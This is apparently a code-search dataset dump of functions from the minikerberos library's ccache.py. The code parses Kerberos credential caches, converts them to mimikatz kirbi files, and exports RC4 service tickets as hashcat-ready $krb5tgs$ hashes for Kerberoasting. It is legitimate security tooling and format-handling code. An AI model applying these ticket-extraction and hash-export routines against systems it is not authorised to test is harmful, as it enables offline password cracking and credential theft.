self.use_this_pk(self.pk_name, key_type)
if suitability in ('absent', 'partial'):
for row in self:
if self.pk_name not in row:
row[self.pk_name] = self.pk.next()
|
skelsec/minikerberos | minikerberos/ccache.py | Header.parse | python | def parse(data):
reader = io.BytesIO(data)
headers = []
while reader.tell() < len(data):
h = Header()
h.tag = int.from_bytes(reader.read(2), byteorder='big', signed=False)
h.taglen = int.from_bytes(reader.read(2), byteorder='big', signed=False)
h.tagdata = reader.read(h.taglen)
headers.append(h)
return headers | returns a list of header tags | train | https://github.com/skelsec/minikerberos/blob/caf14c1d0132119d6e8a8f05120efb7d0824b2c6/minikerberos/ccache.py#L29-L41 | null | class Header:
def __init__(self):
self.tag = None
self.taglen = None
self.tagdata = None
@staticmethod
def to_bytes(self):
t = self.tag.to_bytes(2, byteorder='big', signed=False)
t += len(self.tagdata).to_bytes(2, byteorder='big', signed=False)
t += self.tagdata
return t
def __str__(self):
t = 'tag: %s\n' % self.tag
t += 'taglen: %s\n' % self.taglen
t += 'tagdata: %s\n' % self.tagdata
return t
|
skelsec/minikerberos | minikerberos/ccache.py | Credential.to_tgt | python | def to_tgt(self):
enc_part = EncryptedData({'etype': 1, 'cipher': b''})
tgt_rep = {}
tgt_rep['pvno'] = krb5_pvno
tgt_rep['msg-type'] = MESSAGE_TYPE.KRB_AS_REP.value
tgt_rep['crealm'] = self.server.realm.to_string()
tgt_rep['cname'] = self.client.to_asn1()[0]
tgt_rep['ticket'] = Ticket.load(self.ticket.to_asn1()).native
tgt_rep['enc-part'] = enc_part.native
t = EncryptionKey(self.key.to_asn1()).native
return tgt_rep, t | Returns the native format of an AS_REP message and the sessionkey in EncryptionKey native format | train | https://github.com/skelsec/minikerberos/blob/caf14c1d0132119d6e8a8f05120efb7d0824b2c6/minikerberos/ccache.py#L102-L118 | null | class Credential:
def __init__(self):
self.client = None
self.server = None
self.key = None
self.time = None
self.is_skey = None
self.tktflags = None
self.num_address = None
self.addrs = []
self.num_authdata = None
self.authdata = []
self.ticket = None
self.second_ticket = None
def to_hash(self):
res = Ticket.load(self.ticket.to_asn1()).native
tgs_encryption_type = int(res['enc-part']['etype'])
t = len(res['sname']['name-string'])
if t == 1:
tgs_name_string = res['sname']['name-string'][0]
else:
tgs_name_string = res['sname']['name-string'][1]
tgs_realm = res['realm']
tgs_checksum = res['enc-part']['cipher'][:16]
tgs_encrypted_data2 = res['enc-part']['cipher'][16:]
return '$krb5tgs$%s$*%s$%s$spn*$%s$%s' % (tgs_encryption_type,tgs_name_string,tgs_realm, tgs_checksum.hex(), tgs_encrypted_data2.hex() )
def to_tgt(self):
"""
Returns the native format of an AS_REP message and the sessionkey in EncryptionKey native format
"""
enc_part = EncryptedData({'etype': 1, 'cipher': b''})
tgt_rep = {}
tgt_rep['pvno'] = krb5_pvno
tgt_rep['msg-type'] = MESSAGE_TYPE.KRB_AS_REP.value
tgt_rep['crealm'] = self.server.realm.to_string()
tgt_rep['cname'] = self.client.to_asn1()[0]
tgt_rep['ticket'] = Ticket.load(self.ticket.to_asn1()).native
tgt_rep['enc-part'] = enc_part.native
t = EncryptionKey(self.key.to_asn1()).native
return tgt_rep, t
def to_kirbi(self):
filename = '%s@%s_%s' % (self.client.to_string() , self.server.to_string(), hashlib.sha1(self.ticket.to_asn1()).hexdigest()[:8])
krbcredinfo = {}
krbcredinfo['key'] = EncryptionKey(self.key.to_asn1())
krbcredinfo['prealm'] = self.client.realm.to_string()
krbcredinfo['pname'] = self.client.to_asn1()[0]
krbcredinfo['flags'] = core.IntegerBitString(self.tktflags).cast(TicketFlags)
if self.time.authtime != 0: #this parameter is not mandatory, and most of the time not present
krbcredinfo['authtime'] = datetime.datetime.fromtimestamp(self.time.authtime)
krbcredinfo['starttime'] = datetime.datetime.fromtimestamp(self.time.starttime)
krbcredinfo['endtime'] = datetime.datetime.fromtimestamp(self.time.endtime)
if self.time.renew_till != 0: #this parameter is not mandatory, and sometimes it's not present
krbcredinfo['renew-till'] = datetime.datetime.fromtimestamp(self.time.authtime)
krbcredinfo['srealm'] = self.server.realm.to_string()
krbcredinfo['sname'] = self.server.to_asn1()[0]
enc_krbcred = {}
enc_krbcred['ticket-info'] = [KrbCredInfo(krbcredinfo)]
krbcred = {}
krbcred['pvno'] = krb5_pvno
krbcred['msg-type'] = MESSAGE_TYPE.KRB_CRED.value
krbcred['tickets'] = [Ticket.load(self.ticket.to_asn1())]
krbcred['enc-part'] = EncryptedData({'etype': EncryptionType.NULL.value, 'cipher': EncKrbCredPart(enc_krbcred).dump()})
kirbi = KRBCRED(krbcred)
return kirbi, filename
def from_asn1(ticket, data):
###
# data = KrbCredInfo
###
c = Credential()
c.client = CCACHEPrincipal.from_asn1(data['pname'], data['prealm'])
c.server = CCACHEPrincipal.from_asn1(data['sname'], data['srealm'])
c.key = Keyblock.from_asn1(data['key'])
c.is_skey = 0 #not sure!
c.tktflags = TicketFlags(data['flags']).cast(core.IntegerBitString).native
c.num_address = 0
c.num_authdata = 0
c.ticket = CCACHEOctetString.from_asn1(ticket['enc-part']['cipher'])
c.second_ticket = CCACHEOctetString.empty()
return c
def parse(reader):
c = Credential()
c.client = CCACHEPrincipal.parse(reader)
c.server = CCACHEPrincipal.parse(reader)
c.key = Keyblock.parse(reader)
c.time = Times.parse(reader)
c.is_skey = int.from_bytes(reader.read(1), byteorder='big', signed=False)
c.tktflags = int.from_bytes(reader.read(4), byteorder='little', signed=False)
c.num_address = int.from_bytes(reader.read(4), byteorder='big', signed=False)
for i in range(c.num_address):
c.addrs.append(Address.parse(reader))
c.num_authdata = int.from_bytes(reader.read(4), byteorder='big', signed=False)
for i in range(c.num_authdata):
c.authdata.append(Authdata.parse(reader))
c.ticket = CCACHEOctetString.parse(reader)
c.second_ticket = CCACHEOctetString.parse(reader)
return c
def summary_header():
return ['client','server','starttime','endtime','renew-till']
def summary(self):
return [
'%s@%s' % (self.client.to_string(),self.client.realm.to_string()),
'%s@%s' % (self.server.to_string(), self.server.realm.to_string()),
datetime.datetime.fromtimestamp(self.time.starttime).isoformat() if self.time.starttime != 0 else 'N/A',
datetime.datetime.fromtimestamp(self.time.endtime).isoformat() if self.time.endtime != 0 else 'N/A',
datetime.datetime.fromtimestamp(self.time.renew_till).isoformat() if self.time.renew_till != 0 else 'N/A',
]
def to_bytes(self):
t = self.client.to_bytes()
t += self.server.to_bytes()
t += self.key.to_bytes()
t += self.time.to_bytes()
t += self.is_skey.to_bytes(1, byteorder='big', signed=False)
t += self.tktflags.to_bytes(4, byteorder='little', signed=False)
t += self.num_address.to_bytes(4, byteorder='big', signed=False)
for addr in self.addrs:
t += addr.to_bytes()
t += self.num_authdata.to_bytes(4, byteorder='big', signed=False)
for ad in self.authdata:
t += ad.to_bytes()
t += self.ticket.to_bytes()
t += self.second_ticket.to_bytes()
return t
|
skelsec/minikerberos | minikerberos/ccache.py | CCACHE.add_tgt | python | def add_tgt(self, as_rep, enc_as_rep_part, override_pp = True): #from AS_REP
c = Credential()
c.client = CCACHEPrincipal.from_asn1(as_rep['cname'], as_rep['crealm'])
if override_pp == True:
self.primary_principal = c.client
c.server = CCACHEPrincipal.from_asn1(enc_as_rep_part['sname'], enc_as_rep_part['srealm'])
c.time = Times.from_asn1(enc_as_rep_part)
c.key = Keyblock.from_asn1(enc_as_rep_part['key'])
c.is_skey = 0 #not sure!
c.tktflags = TicketFlags(enc_as_rep_part['flags']).cast(core.IntegerBitString).native
c.num_address = 0
c.num_authdata = 0
c.ticket = CCACHEOctetString.from_asn1(Ticket(as_rep['ticket']).dump())
c.second_ticket = CCACHEOctetString.empty()
self.credentials.append(c) | Creates credential object from the TGT and adds to the ccache file
The TGT is basically the native representation of the asn1 encoded AS_REP data that the AD sends upon a succsessful TGT request.
This function doesn't do decryption of the encrypted part of the as_rep object, it is expected that the decrypted XXX is supplied in enc_as_rep_part
override_pp: bool to determine if client principal should be used as the primary principal for the ccache file | train | https://github.com/skelsec/minikerberos/blob/caf14c1d0132119d6e8a8f05120efb7d0824b2c6/minikerberos/ccache.py#L465-L489 | [
"def from_asn1(data):\n\tk = Keyblock()\n\tk.keytype = data['keytype']\n\tk.etype = 0 # not sure\n\tk.keylen = len(data['keyvalue'])\n\tk.keyvalue = data['keyvalue']\n\n\treturn k\n",
"def from_asn1(enc_as_rep_part):\n\tt = Times()\n\tif 'authtime' in enc_as_rep_part and enc_as_rep_part['authtime']:\n\t\tt.authti... | class CCACHE:
"""
As the header is rarely used -mostly static- you'd need to init this object with empty = True to get an object without header already present
"""
def __init__(self, empty = False):
self.file_format_version = None #0x0504
self.headers = []
self.primary_principal = None
self.credentials = []
if empty == False:
self.__setup()
def __setup(self):
self.file_format_version = 0x0504
header = Header()
header.tag = 1
header.taglen = 8
#header.tagdata = b'\xff\xff\xff\xff\x00\x00\x00\x00'
header.tagdata = b'\x00\x00\x00\x00\x00\x00\x00\x00'
self.headers.append(header)
#t_hdr = b''
#for header in self.headers:
# t_hdr += header.to_bytes()
#self.headerlen = 1 #size of the entire header in bytes, encoded in 2 byte big-endian unsigned int
self.primary_principal = CCACHEPrincipal.dummy()
def __str__(self):
t = '== CCACHE ==\n'
t+= 'file_format_version : %s\n' % self.file_format_version
for header in self.headers:
t+= '%s\n' % header
t+= 'primary_principal : %s\n' % self.primary_principal
return t
def add_tgt(self, as_rep, enc_as_rep_part, override_pp = True): #from AS_REP
"""
Creates credential object from the TGT and adds to the ccache file
The TGT is basically the native representation of the asn1 encoded AS_REP data that the AD sends upon a succsessful TGT request.
This function doesn't do decryption of the encrypted part of the as_rep object, it is expected that the decrypted XXX is supplied in enc_as_rep_part
override_pp: bool to determine if client principal should be used as the primary principal for the ccache file
"""
c = Credential()
c.client = CCACHEPrincipal.from_asn1(as_rep['cname'], as_rep['crealm'])
if override_pp == True:
self.primary_principal = c.client
c.server = CCACHEPrincipal.from_asn1(enc_as_rep_part['sname'], enc_as_rep_part['srealm'])
c.time = Times.from_asn1(enc_as_rep_part)
c.key = Keyblock.from_asn1(enc_as_rep_part['key'])
c.is_skey = 0 #not sure!
c.tktflags = TicketFlags(enc_as_rep_part['flags']).cast(core.IntegerBitString).native
c.num_address = 0
c.num_authdata = 0
c.ticket = CCACHEOctetString.from_asn1(Ticket(as_rep['ticket']).dump())
c.second_ticket = CCACHEOctetString.empty()
self.credentials.append(c)
def add_tgs(self, tgs_rep, enc_tgs_rep_part, override_pp = False): #from AS_REP
"""
Creates credential object from the TGS and adds to the ccache file
The TGS is the native representation of the asn1 encoded TGS_REP data when the user requests a tgs to a specific service principal with a valid TGT
This function doesn't do decryption of the encrypted part of the tgs_rep object, it is expected that the decrypted XXX is supplied in enc_as_rep_part
override_pp: bool to determine if client principal should be used as the primary principal for the ccache file
"""
c = Credential()
c.client = CCACHEPrincipal.from_asn1(tgs_rep['cname'], tgs_rep['crealm'])
if override_pp == True:
self.primary_principal = c.client
c.server = CCACHEPrincipal.from_asn1(enc_tgs_rep_part['sname'], enc_tgs_rep_part['srealm'])
c.time = Times.from_asn1(enc_tgs_rep_part)
c.key = Keyblock.from_asn1(enc_tgs_rep_part['key'])
c.is_skey = 0 #not sure!
c.tktflags = TicketFlags(enc_tgs_rep_part['flags']).cast(core.IntegerBitString).native
c.num_address = 0
c.num_authdata = 0
c.ticket = CCACHEOctetString.from_asn1(Ticket(tgs_rep['ticket']).dump())
c.second_ticket = CCACHEOctetString.empty()
self.credentials.append(c)
def add_kirbi(self, krbcred, override_pp = True, include_expired = False):
c = Credential()
enc_credinfo = EncKrbCredPart.load(krbcred['enc-part']['cipher']).native
ticket_info = enc_credinfo['ticket-info'][0]
"""
if ticket_info['endtime'] < datetime.datetime.now(datetime.timezone.utc):
if include_expired == True:
logging.debug('This ticket has most likely expired, but include_expired is forcing me to add it to cache! This can cause problems!')
else:
logging.debug('This ticket has most likely expired, skipping')
return
"""
c.client = CCACHEPrincipal.from_asn1(ticket_info['pname'], ticket_info['prealm'])
if override_pp == True:
self.primary_principal = c.client
#yaaaaay 4 additional weirdness!!!!
#if sname name-string contains a realm as well htne impacket will crash miserably :(
if len(ticket_info['sname']['name-string']) > 2 and ticket_info['sname']['name-string'][-1].upper() == ticket_info['srealm'].upper():
logging.debug('SNAME contains the realm as well, trimming it')
t = ticket_info['sname']
t['name-string'] = t['name-string'][:-1]
c.server = CCACHEPrincipal.from_asn1(t, ticket_info['srealm'])
else:
c.server = CCACHEPrincipal.from_asn1(ticket_info['sname'], ticket_info['srealm'])
c.time = Times.from_asn1(ticket_info)
c.key = Keyblock.from_asn1(ticket_info['key'])
c.is_skey = 0 #not sure!
c.tktflags = TicketFlags(ticket_info['flags']).cast(core.IntegerBitString).native
c.num_address = 0
c.num_authdata = 0
c.ticket = CCACHEOctetString.from_asn1(Ticket(krbcred['tickets'][0]).dump()) #kirbi only stores one ticket per file
c.second_ticket = CCACHEOctetString.empty()
self.credentials.append(c)
def from_kirbi(kirbidata):
kirbi = KRBCRED.load(kirbidata).native
cc = CCACHE()
cc.add_kirbi(kirbi)
return cc
def get_all_tgt(self):
"""
Returns a list of AS_REP tickets in native format (dict).
To determine which ticket are AP_REP we check for the server principal to be the kerberos service
"""
tgts = []
for cred in self.credentials:
if cred.server.to_string().lower().find('krbtgt') != -1:
tgts.append(cred.to_tgt())
return tgts
def get_hashes(self, all_hashes = False):
"""
Returns a list of hashes in hashcat-firendly format for tickets with encryption type 23 (which is RC4)
all_hashes: overrides the encryption type filtering and returns hash for all tickets
"""
hashes = []
for cred in self.credentials:
res = Ticket.load(cred.ticket.to_asn1()).native
if int(res['enc-part']['etype']) == 23 or all_hashes == True:
hashes.append(cred.to_hash())
return hashes
def parse(reader):
c = CCACHE(True)
c.file_format_version = int.from_bytes(reader.read(2), byteorder='big', signed=False)
hdr_size = int.from_bytes(reader.read(2), byteorder='big', signed=False)
c.headers = Header.parse(reader.read(hdr_size))
#c.headerlen =
#for i in range(c.headerlen):
# c.headers.append(Header.parse(reader))
c.primary_principal = CCACHEPrincipal.parse(reader)
pos = reader.tell()
reader.seek(-1,2)
eof = reader.tell()
reader.seek(pos,0)
while reader.tell() < eof:
c.credentials.append(Credential.parse(reader))
return c
def to_bytes(self):
t = self.file_format_version.to_bytes(2, byteorder='big', signed=False)
t_hdr = b''
for header in self.headers:
t_hdr += header.to_bytes()
t += len(t_hdr).to_bytes(2, byteorder='big', signed=False)
t += t_hdr
t += self.primary_principal.to_bytes()
for cred in self.credentials:
t += cred.to_bytes()
return t
def from_kirbifile(kirbi_filename):
kf_abs = os.path.abspath(kirbi_filename)
kirbidata = None
with open(kf_abs, 'rb') as f:
kirbidata = f.read()
return CCACHE.from_kirbi(kirbidata)
def from_kirbidir(directory_path):
"""
Iterates trough all .kirbi files in a given directory and converts all of them into one CCACHE object
"""
cc = CCACHE()
dir_path = os.path.join(os.path.abspath(directory_path), '*.kirbi')
for filename in glob.glob(dir_path):
with open(filename, 'rb') as f:
kirbidata = f.read()
kirbi = KRBCRED.load(kirbidata).native
cc.add_kirbi(kirbi)
return cc
def to_kirbidir(self, directory_path):
"""
Converts all credential object in the CCACHE object to the kirbi file format used by mimikatz.
The kirbi file format supports one credential per file, so prepare for a lot of files being generated.
directory_path: str the directory to write the kirbi files to
"""
kf_abs = os.path.abspath(directory_path)
for cred in self.credentials:
kirbi, filename = cred.to_kirbi()
filename = '%s.kirbi' % filename.replace('..','!')
filepath = os.path.join(kf_abs, filename)
with open(filepath, 'wb') as o:
o.write(kirbi.dump())
def from_file(filename):
"""
Parses the ccache file and returns a CCACHE object
"""
with open(filename, 'rb') as f:
return CCACHE.parse(f)
def to_file(self, filename):
"""
Writes the contents of the CCACHE object to a file
"""
with open(filename, 'wb') as f:
f.write(self.to_bytes())
|
skelsec/minikerberos | minikerberos/ccache.py | CCACHE.add_tgs | python | def add_tgs(self, tgs_rep, enc_tgs_rep_part, override_pp = False): #from AS_REP
c = Credential()
c.client = CCACHEPrincipal.from_asn1(tgs_rep['cname'], tgs_rep['crealm'])
if override_pp == True:
self.primary_principal = c.client
c.server = CCACHEPrincipal.from_asn1(enc_tgs_rep_part['sname'], enc_tgs_rep_part['srealm'])
c.time = Times.from_asn1(enc_tgs_rep_part)
c.key = Keyblock.from_asn1(enc_tgs_rep_part['key'])
c.is_skey = 0 #not sure!
c.tktflags = TicketFlags(enc_tgs_rep_part['flags']).cast(core.IntegerBitString).native
c.num_address = 0
c.num_authdata = 0
c.ticket = CCACHEOctetString.from_asn1(Ticket(tgs_rep['ticket']).dump())
c.second_ticket = CCACHEOctetString.empty()
self.credentials.append(c) | Creates credential object from the TGS and adds to the ccache file
The TGS is the native representation of the asn1 encoded TGS_REP data when the user requests a tgs to a specific service principal with a valid TGT
This function doesn't do decryption of the encrypted part of the tgs_rep object, it is expected that the decrypted XXX is supplied in enc_as_rep_part
override_pp: bool to determine if client principal should be used as the primary principal for the ccache file | train | https://github.com/skelsec/minikerberos/blob/caf14c1d0132119d6e8a8f05120efb7d0824b2c6/minikerberos/ccache.py#L491-L515 | [
"def from_asn1(data):\n\tk = Keyblock()\n\tk.keytype = data['keytype']\n\tk.etype = 0 # not sure\n\tk.keylen = len(data['keyvalue'])\n\tk.keyvalue = data['keyvalue']\n\n\treturn k\n",
"def from_asn1(enc_as_rep_part):\n\tt = Times()\n\tif 'authtime' in enc_as_rep_part and enc_as_rep_part['authtime']:\n\t\tt.authti... | class CCACHE:
"""
As the header is rarely used -mostly static- you'd need to init this object with empty = True to get an object without header already present
"""
def __init__(self, empty = False):
self.file_format_version = None #0x0504
self.headers = []
self.primary_principal = None
self.credentials = []
if empty == False:
self.__setup()
def __setup(self):
self.file_format_version = 0x0504
header = Header()
header.tag = 1
header.taglen = 8
#header.tagdata = b'\xff\xff\xff\xff\x00\x00\x00\x00'
header.tagdata = b'\x00\x00\x00\x00\x00\x00\x00\x00'
self.headers.append(header)
#t_hdr = b''
#for header in self.headers:
# t_hdr += header.to_bytes()
#self.headerlen = 1 #size of the entire header in bytes, encoded in 2 byte big-endian unsigned int
self.primary_principal = CCACHEPrincipal.dummy()
def __str__(self):
t = '== CCACHE ==\n'
t+= 'file_format_version : %s\n' % self.file_format_version
for header in self.headers:
t+= '%s\n' % header
t+= 'primary_principal : %s\n' % self.primary_principal
return t
def add_tgt(self, as_rep, enc_as_rep_part, override_pp = True): #from AS_REP
"""
Creates credential object from the TGT and adds to the ccache file
The TGT is basically the native representation of the asn1 encoded AS_REP data that the AD sends upon a succsessful TGT request.
This function doesn't do decryption of the encrypted part of the as_rep object, it is expected that the decrypted XXX is supplied in enc_as_rep_part
override_pp: bool to determine if client principal should be used as the primary principal for the ccache file
"""
c = Credential()
c.client = CCACHEPrincipal.from_asn1(as_rep['cname'], as_rep['crealm'])
if override_pp == True:
self.primary_principal = c.client
c.server = CCACHEPrincipal.from_asn1(enc_as_rep_part['sname'], enc_as_rep_part['srealm'])
c.time = Times.from_asn1(enc_as_rep_part)
c.key = Keyblock.from_asn1(enc_as_rep_part['key'])
c.is_skey = 0 #not sure!
c.tktflags = TicketFlags(enc_as_rep_part['flags']).cast(core.IntegerBitString).native
c.num_address = 0
c.num_authdata = 0
c.ticket = CCACHEOctetString.from_asn1(Ticket(as_rep['ticket']).dump())
c.second_ticket = CCACHEOctetString.empty()
self.credentials.append(c)
def add_tgs(self, tgs_rep, enc_tgs_rep_part, override_pp = False): #from AS_REP
"""
Creates credential object from the TGS and adds to the ccache file
The TGS is the native representation of the asn1 encoded TGS_REP data when the user requests a tgs to a specific service principal with a valid TGT
This function doesn't do decryption of the encrypted part of the tgs_rep object, it is expected that the decrypted XXX is supplied in enc_as_rep_part
override_pp: bool to determine if client principal should be used as the primary principal for the ccache file
"""
c = Credential()
c.client = CCACHEPrincipal.from_asn1(tgs_rep['cname'], tgs_rep['crealm'])
if override_pp == True:
self.primary_principal = c.client
c.server = CCACHEPrincipal.from_asn1(enc_tgs_rep_part['sname'], enc_tgs_rep_part['srealm'])
c.time = Times.from_asn1(enc_tgs_rep_part)
c.key = Keyblock.from_asn1(enc_tgs_rep_part['key'])
c.is_skey = 0 #not sure!
c.tktflags = TicketFlags(enc_tgs_rep_part['flags']).cast(core.IntegerBitString).native
c.num_address = 0
c.num_authdata = 0
c.ticket = CCACHEOctetString.from_asn1(Ticket(tgs_rep['ticket']).dump())
c.second_ticket = CCACHEOctetString.empty()
self.credentials.append(c)
def add_kirbi(self, krbcred, override_pp = True, include_expired = False):
c = Credential()
enc_credinfo = EncKrbCredPart.load(krbcred['enc-part']['cipher']).native
ticket_info = enc_credinfo['ticket-info'][0]
"""
if ticket_info['endtime'] < datetime.datetime.now(datetime.timezone.utc):
if include_expired == True:
logging.debug('This ticket has most likely expired, but include_expired is forcing me to add it to cache! This can cause problems!')
else:
logging.debug('This ticket has most likely expired, skipping')
return
"""
c.client = CCACHEPrincipal.from_asn1(ticket_info['pname'], ticket_info['prealm'])
if override_pp == True:
self.primary_principal = c.client
#yaaaaay 4 additional weirdness!!!!
#if sname name-string contains a realm as well htne impacket will crash miserably :(
if len(ticket_info['sname']['name-string']) > 2 and ticket_info['sname']['name-string'][-1].upper() == ticket_info['srealm'].upper():
logging.debug('SNAME contains the realm as well, trimming it')
t = ticket_info['sname']
t['name-string'] = t['name-string'][:-1]
c.server = CCACHEPrincipal.from_asn1(t, ticket_info['srealm'])
else:
c.server = CCACHEPrincipal.from_asn1(ticket_info['sname'], ticket_info['srealm'])
c.time = Times.from_asn1(ticket_info)
c.key = Keyblock.from_asn1(ticket_info['key'])
c.is_skey = 0 #not sure!
c.tktflags = TicketFlags(ticket_info['flags']).cast(core.IntegerBitString).native
c.num_address = 0
c.num_authdata = 0
c.ticket = CCACHEOctetString.from_asn1(Ticket(krbcred['tickets'][0]).dump()) #kirbi only stores one ticket per file
c.second_ticket = CCACHEOctetString.empty()
self.credentials.append(c)
def from_kirbi(kirbidata):
kirbi = KRBCRED.load(kirbidata).native
cc = CCACHE()
cc.add_kirbi(kirbi)
return cc
def get_all_tgt(self):
"""
Returns a list of AS_REP tickets in native format (dict).
To determine which ticket are AP_REP we check for the server principal to be the kerberos service
"""
tgts = []
for cred in self.credentials:
if cred.server.to_string().lower().find('krbtgt') != -1:
tgts.append(cred.to_tgt())
return tgts
def get_hashes(self, all_hashes = False):
"""
Returns a list of hashes in hashcat-firendly format for tickets with encryption type 23 (which is RC4)
all_hashes: overrides the encryption type filtering and returns hash for all tickets
"""
hashes = []
for cred in self.credentials:
res = Ticket.load(cred.ticket.to_asn1()).native
if int(res['enc-part']['etype']) == 23 or all_hashes == True:
hashes.append(cred.to_hash())
return hashes
def parse(reader):
c = CCACHE(True)
c.file_format_version = int.from_bytes(reader.read(2), byteorder='big', signed=False)
hdr_size = int.from_bytes(reader.read(2), byteorder='big', signed=False)
c.headers = Header.parse(reader.read(hdr_size))
#c.headerlen =
#for i in range(c.headerlen):
# c.headers.append(Header.parse(reader))
c.primary_principal = CCACHEPrincipal.parse(reader)
pos = reader.tell()
reader.seek(-1,2)
eof = reader.tell()
reader.seek(pos,0)
while reader.tell() < eof:
c.credentials.append(Credential.parse(reader))
return c
def to_bytes(self):
t = self.file_format_version.to_bytes(2, byteorder='big', signed=False)
t_hdr = b''
for header in self.headers:
t_hdr += header.to_bytes()
t += len(t_hdr).to_bytes(2, byteorder='big', signed=False)
t += t_hdr
t += self.primary_principal.to_bytes()
for cred in self.credentials:
t += cred.to_bytes()
return t
def from_kirbifile(kirbi_filename):
kf_abs = os.path.abspath(kirbi_filename)
kirbidata = None
with open(kf_abs, 'rb') as f:
kirbidata = f.read()
return CCACHE.from_kirbi(kirbidata)
def from_kirbidir(directory_path):
"""
Iterates trough all .kirbi files in a given directory and converts all of them into one CCACHE object
"""
cc = CCACHE()
dir_path = os.path.join(os.path.abspath(directory_path), '*.kirbi')
for filename in glob.glob(dir_path):
with open(filename, 'rb') as f:
kirbidata = f.read()
kirbi = KRBCRED.load(kirbidata).native
cc.add_kirbi(kirbi)
return cc
def to_kirbidir(self, directory_path):
"""
Converts all credential object in the CCACHE object to the kirbi file format used by mimikatz.
The kirbi file format supports one credential per file, so prepare for a lot of files being generated.
directory_path: str the directory to write the kirbi files to
"""
kf_abs = os.path.abspath(directory_path)
for cred in self.credentials:
kirbi, filename = cred.to_kirbi()
filename = '%s.kirbi' % filename.replace('..','!')
filepath = os.path.join(kf_abs, filename)
with open(filepath, 'wb') as o:
o.write(kirbi.dump())
def from_file(filename):
"""
Parses the ccache file and returns a CCACHE object
"""
with open(filename, 'rb') as f:
return CCACHE.parse(f)
def to_file(self, filename):
"""
Writes the contents of the CCACHE object to a file
"""
with open(filename, 'wb') as f:
f.write(self.to_bytes())
|
skelsec/minikerberos | minikerberos/ccache.py | CCACHE.add_kirbi | python | def add_kirbi(self, krbcred, override_pp = True, include_expired = False):
c = Credential()
enc_credinfo = EncKrbCredPart.load(krbcred['enc-part']['cipher']).native
ticket_info = enc_credinfo['ticket-info'][0]
c.client = CCACHEPrincipal.from_asn1(ticket_info['pname'], ticket_info['prealm'])
if override_pp == True:
self.primary_principal = c.client
#yaaaaay 4 additional weirdness!!!!
#if sname name-string contains a realm as well htne impacket will crash miserably :(
if len(ticket_info['sname']['name-string']) > 2 and ticket_info['sname']['name-string'][-1].upper() == ticket_info['srealm'].upper():
logging.debug('SNAME contains the realm as well, trimming it')
t = ticket_info['sname']
t['name-string'] = t['name-string'][:-1]
c.server = CCACHEPrincipal.from_asn1(t, ticket_info['srealm'])
else:
c.server = CCACHEPrincipal.from_asn1(ticket_info['sname'], ticket_info['srealm'])
c.time = Times.from_asn1(ticket_info)
c.key = Keyblock.from_asn1(ticket_info['key'])
c.is_skey = 0 #not sure!
c.tktflags = TicketFlags(ticket_info['flags']).cast(core.IntegerBitString).native
c.num_address = 0
c.num_authdata = 0
c.ticket = CCACHEOctetString.from_asn1(Ticket(krbcred['tickets'][0]).dump()) #kirbi only stores one ticket per file
c.second_ticket = CCACHEOctetString.empty()
self.credentials.append(c) | if ticket_info['endtime'] < datetime.datetime.now(datetime.timezone.utc):
if include_expired == True:
logging.debug('This ticket has most likely expired, but include_expired is forcing me to add it to cache! This can cause problems!')
else:
logging.debug('This ticket has most likely expired, skipping')
return | train | https://github.com/skelsec/minikerberos/blob/caf14c1d0132119d6e8a8f05120efb7d0824b2c6/minikerberos/ccache.py#L518-L557 | [
"def from_asn1(data):\n\tk = Keyblock()\n\tk.keytype = data['keytype']\n\tk.etype = 0 # not sure\n\tk.keylen = len(data['keyvalue'])\n\tk.keyvalue = data['keyvalue']\n\n\treturn k\n",
"def from_asn1(enc_as_rep_part):\n\tt = Times()\n\tif 'authtime' in enc_as_rep_part and enc_as_rep_part['authtime']:\n\t\tt.authti... | class CCACHE:
"""
As the header is rarely used -mostly static- you'd need to init this object with empty = True to get an object without header already present
"""
def __init__(self, empty = False):
self.file_format_version = None #0x0504
self.headers = []
self.primary_principal = None
self.credentials = []
if empty == False:
self.__setup()
def __setup(self):
self.file_format_version = 0x0504
header = Header()
header.tag = 1
header.taglen = 8
#header.tagdata = b'\xff\xff\xff\xff\x00\x00\x00\x00'
header.tagdata = b'\x00\x00\x00\x00\x00\x00\x00\x00'
self.headers.append(header)
#t_hdr = b''
#for header in self.headers:
# t_hdr += header.to_bytes()
#self.headerlen = 1 #size of the entire header in bytes, encoded in 2 byte big-endian unsigned int
self.primary_principal = CCACHEPrincipal.dummy()
def __str__(self):
t = '== CCACHE ==\n'
t+= 'file_format_version : %s\n' % self.file_format_version
for header in self.headers:
t+= '%s\n' % header
t+= 'primary_principal : %s\n' % self.primary_principal
return t
def add_tgt(self, as_rep, enc_as_rep_part, override_pp = True): #from AS_REP
"""
Creates credential object from the TGT and adds to the ccache file
The TGT is basically the native representation of the asn1 encoded AS_REP data that the AD sends upon a succsessful TGT request.
This function doesn't do decryption of the encrypted part of the as_rep object, it is expected that the decrypted XXX is supplied in enc_as_rep_part
override_pp: bool to determine if client principal should be used as the primary principal for the ccache file
"""
c = Credential()
c.client = CCACHEPrincipal.from_asn1(as_rep['cname'], as_rep['crealm'])
if override_pp == True:
self.primary_principal = c.client
c.server = CCACHEPrincipal.from_asn1(enc_as_rep_part['sname'], enc_as_rep_part['srealm'])
c.time = Times.from_asn1(enc_as_rep_part)
c.key = Keyblock.from_asn1(enc_as_rep_part['key'])
c.is_skey = 0 #not sure!
c.tktflags = TicketFlags(enc_as_rep_part['flags']).cast(core.IntegerBitString).native
c.num_address = 0
c.num_authdata = 0
c.ticket = CCACHEOctetString.from_asn1(Ticket(as_rep['ticket']).dump())
c.second_ticket = CCACHEOctetString.empty()
self.credentials.append(c)
def add_tgs(self, tgs_rep, enc_tgs_rep_part, override_pp = False): #from AS_REP
"""
Creates credential object from the TGS and adds to the ccache file
The TGS is the native representation of the asn1 encoded TGS_REP data when the user requests a tgs to a specific service principal with a valid TGT
This function doesn't do decryption of the encrypted part of the tgs_rep object, it is expected that the decrypted XXX is supplied in enc_as_rep_part
override_pp: bool to determine if client principal should be used as the primary principal for the ccache file
"""
c = Credential()
c.client = CCACHEPrincipal.from_asn1(tgs_rep['cname'], tgs_rep['crealm'])
if override_pp == True:
self.primary_principal = c.client
c.server = CCACHEPrincipal.from_asn1(enc_tgs_rep_part['sname'], enc_tgs_rep_part['srealm'])
c.time = Times.from_asn1(enc_tgs_rep_part)
c.key = Keyblock.from_asn1(enc_tgs_rep_part['key'])
c.is_skey = 0 #not sure!
c.tktflags = TicketFlags(enc_tgs_rep_part['flags']).cast(core.IntegerBitString).native
c.num_address = 0
c.num_authdata = 0
c.ticket = CCACHEOctetString.from_asn1(Ticket(tgs_rep['ticket']).dump())
c.second_ticket = CCACHEOctetString.empty()
self.credentials.append(c)
